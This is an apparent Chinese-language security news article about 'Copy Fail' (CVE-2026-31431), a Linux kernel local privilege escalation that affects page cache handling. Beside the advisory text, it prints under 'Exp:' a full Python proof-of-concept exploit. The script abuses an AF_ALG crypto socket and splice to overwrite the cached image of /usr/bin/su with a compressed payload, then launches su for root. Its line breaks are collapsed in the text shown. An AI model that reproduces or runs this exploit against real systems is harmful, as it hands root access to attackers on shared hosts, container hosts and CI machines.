当前位置:首页>Linux>高危 Linux 本地提权漏洞 Copy Fail 公开披露,普通低权限用户可拿下 root,建议立即排查

高危 Linux 本地提权漏洞 Copy Fail 公开披露,普通低权限用户可拿下 root,建议立即排查

  • 2026-10-11 08:21:58
高危 Linux 本地提权漏洞 Copy Fail 公开披露,普通低权限用户可拿下 root,建议立即排查

公开信息显示,CVE-2026-31431 涉及 Linux 内核底层处理路径,攻击者在取得本地低权限后,可能进一步实现 root 提权。

近日,一项被命名为 Copy Fail 的 Linux 本地提权漏洞被公开披露,对应编号为 CVE-2026-31431。从目前公开披露的信息来看,该漏洞影响范围较广,利用门槛相对较低,且已经出现公开 PoC。对于企业而言,这类漏洞虽然不直接提供远程入侵能力,但在共享主机、容器宿主机、自建 CI/CD 跑机、多用户研发环境等场景中,依然具备较高的现实风险。

Exp:

#!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")

漏洞类型:Linux 内核本地提权(LPE),通过页面缓存写入实现

影响范围:2017 年至 2026 年 几乎所有主流 Linux 发行版

利用方式:该漏洞可被本地低权限攻击者利用,通过异常影响 page cache 相关内容,进一步实现 root 提权。

攻击载荷:仅 732 字节的 Python 脚本

最新文章

随机文章